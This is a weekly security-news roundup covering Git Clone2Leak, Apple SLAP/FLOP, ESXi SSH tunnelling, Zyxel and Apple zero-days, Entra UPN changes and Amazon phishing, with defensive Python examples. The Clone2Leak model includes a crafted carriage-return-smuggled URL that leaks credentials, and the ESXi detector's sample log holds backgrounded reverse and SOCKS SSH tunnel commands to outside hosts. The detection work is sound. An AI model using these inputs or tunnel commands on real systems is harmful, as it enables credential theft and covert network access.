Weekly Security News – 3rd February 2025

Phishing campaign targets Amazon Prime members, Apple vulnerability being exploited, and Zyxel routers under attack...

Welcome to this week’s Security News. We’ve collated the best articles from around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.

Vulnerabilities and Patches

GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs

Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials.

“Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,” GMO Flatt Security researcher Ry0taK, who discovered the flaws, said in an analysis published Sunday. “Because of improper handling of messages, many projects were vulnerable to credential leakage in various ways.”

The list of identified vulnerabilities, dubbed Clone2Leak, is as follows –

  • CVE-2025-23040 (CVSS score: 6.6) – Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop
  • CVE-2024-50338 (CVSS score: 7.4) – Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager
  • CVE-2024-53263 (CVSS score: 8.5) – Git LFS permits retrieval of credentials via crafted HTTP URLs
  • CVE-2024-53858 (CVSS score: 6.5) – Recursive repository cloning in GitHub CLI can leak authentication tokens to non-GitHub submodule hosts

The Git Credential Protocol is line-based: Git writes key=value attributes such as protocol and host to the helper, one per line and terminated by the newline character (“\n”), and the helper answers with the matching username and password in the same form. The research found that GitHub Desktop is susceptible to carriage-return (“\r”) smuggling: a “\r” injected through a crafted remote URL is treated by the helper as a line break, so a second host= value can be appended that overrides the first, and the helper returns credentials for a trusted host that Git then sends to the attacker-controlled host it is actually connecting to.
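The following is an added example, not code from Git, GitHub Desktop or the research write-up. It models the credential-helper exchange in miniature: a lenient line splitter (the .NET/Node behaviour of treating a lone “\r” as a newline) beside a strict one that only accepts “\n” and rejects control characters in attribute values, which is the shape of the fix Git itself shipped. The credential store, the URL shape used for the smuggled host (modelled on the older newline variant, CVE-2020-5260) and the sample URLs are all constructed for this example.

```python
"""Toy model of the Git Credential Protocol exchange behind Clone2Leak."""
import re
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import unquote

# Constructed stand-in for the helper's credential store (not real secrets).
STORE: Dict[str, Tuple[str, str]] = {"github.com": ("octocat", "ghp_EXAMPLE_NOT_REAL")}

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
Parser = Callable[[str], Dict[str, str]]


def git_request(remote_url: str) -> str:
    """Model of Git building the helper request for a remote URL.

    Like Git's own URL parsing, the host is everything after "://" up to the
    first "/", percent-decoded. (Git 2.48.1 and later refuse to talk to the
    helper if that decoded value contains a newline or carriage return.)
    """
    scheme, rest = remote_url.split("://", 1)
    host = unquote(rest.split("/", 1)[0])
    return f"protocol={scheme}\nhost={host}\n\n"


def network_host(remote_url: str) -> str:
    """The host the HTTP client really connects to: the authority up to the
    first '/', '?' or '#'. Anything after '?' is query, which is where the
    smuggled bytes hide in this model."""
    rest = remote_url.split("://", 1)[1]
    return re.split(r"[/?#]", rest, maxsplit=1)[0]


def parse_lenient(request: str) -> Dict[str, str]:
    """Vulnerable: \\r, \\n and \\r\\n are all line terminators (what .NET
    ReadLine() and Node's readline do); a repeated key silently overwrites."""
    attrs: Dict[str, str] = {}
    for line in re.split(r"\r\n|\r|\n", request):
        if line == "":          # blank line ends the request
            break
        key, _, value = line.partition("=")
        attrs[key] = value
    return attrs


def parse_strict(request: str) -> Dict[str, str]:
    """Hardened: only \\n ends a line, and any other control byte in a key or
    value is an error instead of being re-interpreted as structure."""
    attrs: Dict[str, str] = {}
    for line in request.split("\n"):
        if line == "":
            break
        key, sep, value = line.partition("=")
        if not sep or CONTROL.search(key) or CONTROL.search(value):
            raise ValueError(f"malformed credential line: {line!r}")
        attrs[key] = value
    return attrs


def helper_get(request: str, parser: Parser) -> Optional[Tuple[str, str]]:
    """The helper's 'get' action: return the stored credential for attrs['host']."""
    attrs = parser(request)
    return STORE.get(attrs.get("host", ""))


def clone_outcome(remote_url: str, parser: Parser):
    """(host Git connects to, credential the helper handed back) for one clone."""
    return network_host(remote_url), helper_get(git_request(remote_url), parser)


def leaks_credentials(remote_url: str, parser: Parser) -> bool:
    """True when the helper returns a credential that belongs to a different
    host than the one Git is about to connect to. The strict parser raises
    on the smuggled request instead, which counts as no leak."""
    try:
        host, cred = clone_outcome(remote_url, parser)
    except ValueError:
        return False
    return cred is not None and STORE.get(host) != cred


if __name__ == "__main__":
    benign = "https://github.com/octocat/hello.git"
    smuggled = "https://one.example.com?%0dhost=github.com/repo.git"   # constructed
    for url in (benign, smuggled):
        print(url, "lenient leak:", leaks_credentials(url, parse_lenient),
              "strict leak:", leaks_credentials(url, parse_strict))
```

With the lenient parser the smuggled URL makes the helper return the github.com credential while Git is connecting to one.example.com; the strict parser rejects the request outright, which is the behaviour to look for when checking a helper of your own.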

New SLAP & FLOP Attacks Expose Apple M-Series Chips to Speculative Execution Exploits

A team of security researchers from Georgia Institute of Technology and Ruhr University Bochum has demonstrated two new side-channel attacks targeting Apple silicon that could be exploited to leak sensitive information from web browsers like Safari and Google Chrome.

The attacks have been codenamed Data Speculation Attacks via Load Address Prediction on Apple Silicon (SLAP) and Breaking the Apple M3 CPU via False Load Output Predictions (FLOP). Apple was notified of the issues in May and September 2024, respectively.

The vulnerabilities, like the previously disclosed iLeakage attack, build on Spectre, arising when speculative execution “backfires,” leaving traces of mispredictions in the CPU’s microarchitectural state and the cache.

Speculative execution is a performance optimisation in modern processors: rather than wait for the outcome of a branch or a load, the CPU predicts it and executes the instructions along the predicted path ahead of time.

If the prediction turns out to be wrong, the results of those transiently executed instructions are discarded and the architectural state is rolled back to the point of the prediction.

These attacks deliberately force a misprediction so that the CPU transiently executes a sequence of attacker-chosen instructions. Although the architectural state is rolled back, the microarchitectural traces those instructions leave (for example, in the cache) are not, and the values they touched can be inferred afterwards through a side channel. As the names indicate, SLAP abuses the load address predictor and FLOP the load value predictor, rather than the branch predictor that classic Spectre variants target.

Cyber Attacks

Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations

Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also leveraging the access to repurpose the appliances as a conduit to tunnel traffic to command-and-control (C2) infrastructure and stay under the radar.

“ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely,” Sygnia researchers Aaron (Zhongyuan) Hau and Ren Jie Yow said in a report published last week.

“Threat actors use these platforms by adopting ‘living-off-the-land’ techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers and the compromised environment.”

In doing so, the idea is to blend into legitimate traffic and establish long-term persistence on the compromised network with little-to-no detection by security controls.

The cybersecurity company said in many of its incident response engagements, ESXi systems were compromised either by using admin credentials or leveraging a known security vulnerability to get around authentication protections. Subsequently, the threat actors have been found to set up a tunnel using SSH or other tools with equivalent functionality.

“Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.
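The tunnelling pattern described above is visible on the host itself if the ESXi shell log is actually reviewed. The block below is an added example, not Sygnia's code: it parses shell-log entries, recognises ssh invocations that create remote (-R), dynamic (-D), local (-L) or stdio (-W) forwards, including the -o RemoteForward/DynamicForward/LocalForward spellings, and rates a backgrounded (-f/-N) remote or dynamic forward as the highest-risk shape, which is the SOCKS-tunnel case in the report. The log line layout "<timestamp> shell[<pid>]: [<user>]: <command>" and every sample line are constructed for this example.

```python
"""Flag ssh tunnel set-up in ESXi /var/log/shell.log entries (added example)."""
import re
import shlex
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")

# ssh flags that create a tunnel, and the equivalent -o option names
FORWARD_FLAGS = {"R": "remote", "D": "dynamic", "L": "local", "W": "stdio"}
FORWARD_OPTS = {"remoteforward": "remote", "dynamicforward": "dynamic", "localforward": "local"}
# other ssh options that take an argument, so that argument is never read as a flag/host
ARG_FLAGS = set("BbcEeFIiJlmOpQSw")

# Constructed sample log; the format mirrors ESXi's shell.log but is not real data.
SAMPLE_SHELL_LOG = """\
2025-01-20T03:12:44Z shell[2100314]: [root]: esxcli system version get
2025-01-20T03:13:02Z shell[2100314]: [root]: ssh -fN -R 127.0.0.1:1080 svc@203.0.113.10
2025-01-20T03:15:19Z shell[2100314]: [root]: ssh -i /tmp/.k -o StrictHostKeyChecking=no -N -D 9050 ops@198.51.100.7
2025-01-20T03:16:00Z shell[2100314]: [root]: ssh admin@10.0.0.5
2025-01-20T03:17:30Z shell[2100314]: [root]: vim-cmd vmsvc/getallvms
"""


def analyse_ssh(argv: List[str]) -> Tuple[List[Tuple[str, str]], bool]:
    """Return (forwards, background) for an ssh argv.

    forwards: list of (kind, spec) tunnels requested on the command line.
    background: True when -f or -N keep the session alive without a shell.
    """
    forwards: List[Tuple[str, str]] = []
    background = False
    i = 1
    while i < len(argv):
        arg = argv[i]
        if len(arg) < 2 or not arg.startswith("-"):
            i += 1
            continue
        flag, rest = arg[1], arg[2:]
        if flag == "o":                                   # -oKey=Val or -o Key=Val / "Key Val"
            opt = rest or (argv[i + 1] if i + 1 < len(argv) else "")
            i += 0 if rest else 1
            m = re.match(r"\s*([A-Za-z]+)[=\s]+(.*)", opt)
            if m and m.group(1).lower() in FORWARD_OPTS:
                forwards.append((FORWARD_OPTS[m.group(1).lower()], m.group(2).strip()))
        elif flag in FORWARD_FLAGS:                       # -R spec or -Rspec
            spec = rest or (argv[i + 1] if i + 1 < len(argv) else "")
            i += 0 if rest else 1
            forwards.append((FORWARD_FLAGS[flag], spec))
        elif flag in ARG_FLAGS:                           # skip the option's argument
            i += 0 if rest else 1
        else:                                             # bundled no-arg flags such as -fN
            background = background or any(ch in "fN" for ch in arg[1:])
        i += 1
    return forwards, background


def scan_shell_log(text: str) -> List[Dict]:
    """Return one finding per ssh command that sets up a forward."""
    findings: List[Dict] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        try:
            argv = shlex.split(m["cmd"])
        except ValueError:
            continue
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue
        forwards, background = analyse_ssh(argv)
        if not forwards:
            continue
        destination: Optional[str] = next(
            (a for a in argv[1:] if "@" in a and not a.startswith("-")), None)
        # A backgrounded remote/dynamic forward is the C2-side SOCKS proxy shape.
        high = background and any(kind in ("remote", "dynamic") for kind, _ in forwards)
        findings.append({
            "ts": m["ts"], "pid": m["pid"], "user": m["user"],
            "destination": destination, "forwards": forwards,
            "background": background, "severity": "high" if high else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan_shell_log(SAMPLE_SHELL_LOG):
        print(f["ts"], f["severity"], f["user"], "->", f["destination"], f["forwards"])
```

The same analyser can be pointed at the shell history or at the command lines of running ssh processes; the point is that an ESXi host initiating an outbound ssh session with a forward, and especially one that never opens a shell, is not something a hypervisor does on its own.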

Hackers Actively Exploiting Zyxel 0-day Vulnerability to Execute Arbitrary Commands

A significant zero-day vulnerability in Zyxel CPE series devices, identified as CVE-2024-40891, is being actively exploited by attackers.

This vulnerability enables attackers to execute arbitrary commands on affected devices, posing significant risks of system compromise, data theft, and network infiltration.

Censys scans found more than 1,500 exposed devices that appear to be vulnerable. At the time of reporting, the vulnerability had not been patched and no public advisory had been issued.

The vulnerability is a command injection flaw in the telnet management interface of Zyxel CPE devices, arising from improper input validation. Attackers without legitimate credentials can execute arbitrary commands by abusing built-in service accounts such as “supervisor” or “zyuser.” Until a fix is available, the practical mitigation is to make sure the telnet interface is not reachable from the internet or other untrusted networks.

Apple Zero-day Vulnerability Actively Exploited to Attack iPhone Users

Apple has released critical security updates to address a zero-day vulnerability actively exploited in attacks targeting iPhone users. 

The flaw, identified as CVE-2025-24085, is a use-after-free issue in the Core Media framework, which handles multimedia processing across Apple’s ecosystem. 

This vulnerability, with a CVSS score of 9.8, allows malicious applications to elevate privileges, posing significant risks to user devices.

The Core Media framework is integral to Apple’s media processing pipeline, supporting high-level frameworks like AVFoundation. The vulnerability stems from improper memory management, enabling attackers to exploit the flaw for privilege escalation.

Apple said it is aware of a report that the issue may have been actively exploited against versions of iOS before iOS 17.2.

In Other News...

Microsoft Entra ID Bug Allows Unprivileged Users to Change Their User Principal Names

Microsoft has allowed unprivileged users to update their own User Principal Names (UPNs) in Entra ID, sparking concerns over security and administrative oversight.

To clarify, an unprivileged user can update the user principal name (UPN) for their own Entra ID account but not for others. However, it’s hard to see why any organization would intentionally allow users to modify such a fundamental attribute as the UPN, yet this capability exists.

This change, which can be executed through the Entra admin center or tools like the Microsoft Graph PowerShell SDK, has raised questions about its necessity and potential risks.

Previously, UPN updates were typically restricted to administrators. However, it is now possible for any user to modify their UPN, which is a critical identifier for accessing Microsoft services.

Testing confirmed that users could navigate to their account properties in the Entra admin center and directly edit their UPNs. A similar update can also be performed using the Microsoft Graph PowerShell SDK, as both interfaces rely on the Microsoft Graph Users API.
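Whichever interface is used, a self-service UPN change lands in the Entra audit log as an “Update user” event whose initiator and target are the same account. The block below is an added example, not Microsoft's code: it filters audit records for exactly that case and reports the old and new UPN. The records are constructed here in the shape of Microsoft Graph `auditLogs/directoryAudits` entries as this example assumes them (initiatedBy.user.id, targetResources[].id and modifiedProperties with JSON-encoded old/new values); verify those field names against the tenant's real export before relying on it.

```python
"""Find self-service UserPrincipalName changes in Entra audit records (added example)."""
import json
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample in the assumed shape of Graph directoryAudit records.
SAMPLE_AUDIT = [
    {   # an administrator renaming someone else: expected, not flagged
        "activityDisplayName": "Update user", "activityDateTime": "2025-01-28T09:02:11Z",
        "initiatedBy": {"user": {"id": "admin-0001", "userPrincipalName": "admin@contoso.example"}},
        "targetResources": [{"id": "user-0042", "userPrincipalName": "bob@contoso.example",
            "modifiedProperties": [{"displayName": "UserPrincipalName",
                "oldValue": json.dumps(["robert@contoso.example"]),
                "newValue": json.dumps(["bob@contoso.example"])}]}],
    },
    {   # a user renaming themselves: the case the article describes, flagged
        "activityDisplayName": "Update user", "activityDateTime": "2025-01-28T10:15:40Z",
        "initiatedBy": {"user": {"id": "user-0007", "userPrincipalName": "alice@contoso.example"}},
        "targetResources": [{"id": "user-0007", "userPrincipalName": "alice@contoso.example",
            "modifiedProperties": [{"displayName": "UserPrincipalName",
                "oldValue": json.dumps(["alice@contoso.example"]),
                "newValue": json.dumps(["ceo@contoso.example"])}]}],
    },
    {   # a user editing only their display name: not a UPN change, not flagged
        "activityDisplayName": "Update user", "activityDateTime": "2025-01-28T11:00:00Z",
        "initiatedBy": {"user": {"id": "user-0009", "userPrincipalName": "dan@contoso.example"}},
        "targetResources": [{"id": "user-0009", "userPrincipalName": "dan@contoso.example",
            "modifiedProperties": [{"displayName": "DisplayName",
                "oldValue": json.dumps(["Dan"]), "newValue": json.dumps(["Daniel"])}]}],
    },
]


def decode_value(value: Optional[str]) -> Any:
    """Graph serialises modifiedProperties old/new values as JSON strings such as
    '["alice@contoso.example"]'; unwrap a one-element list to the plain string."""
    if value is None:
        return None
    try:
        parsed = json.loads(value)
    except (TypeError, ValueError):
        return value
    if isinstance(parsed, list) and len(parsed) == 1:
        return parsed[0]
    return parsed


def self_service_upn_changes(records: List[Dict]) -> List[Tuple[str, str, str, str]]:
    """Return (actor, old_upn, new_upn, timestamp) for every 'Update user' record
    in which the initiating user is the target user and UserPrincipalName changed.
    Identities are matched on object id, not UPN, because the UPN is what moved."""
    hits = []
    for rec in records:
        if rec.get("activityDisplayName") != "Update user":
            continue
        actor = (rec.get("initiatedBy") or {}).get("user") or {}
        actor_id = actor.get("id")
        for target in rec.get("targetResources", []):
            if not actor_id or actor_id != target.get("id"):
                continue
            for prop in target.get("modifiedProperties", []):
                if prop.get("displayName") != "UserPrincipalName":
                    continue
                old, new = decode_value(prop.get("oldValue")), decode_value(prop.get("newValue"))
                if old != new:
                    hits.append((actor.get("userPrincipalName", ""), old, new,
                                 rec.get("activityDateTime", "")))
    return hits


if __name__ == "__main__":
    for actor, old, new, when in self_service_upn_changes(SAMPLE_AUDIT):
        print(f"{when} {actor} changed own UPN {old} -> {new}")
```

In a live tenant the input is the JSON returned by `GET https://graph.microsoft.com/v1.0/auditLogs/directoryAudits` (filtered on `activityDisplayName eq 'Update user'`), or the same events forwarded to a SIEM; a hit is worth an alert because the new UPN is what the user will sign in with from then on.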

New Phishing Campaign Mimics Amazon Prime Membership To Steal Credit Card Data

A sophisticated phishing campaign targeting Amazon Prime members has been uncovered, aiming to steal credit card information and other sensitive data.

Cybersecurity experts have identified a complex attack chain that leverages PDF attachments, redirects, and cleverly crafted phishing sites to deceive unsuspecting victims.

The campaign begins with malicious PDF files containing links to phishing sites impersonating Amazon.

Researchers have collected 31 such PDF files, each with a unique SHA256 hash.

Security analysts at Palo Alto Networks’ Unit 42 noted that these PDFs redirect users through a series of URLs, ultimately leading to a fraudulent site designed to capture credit card information.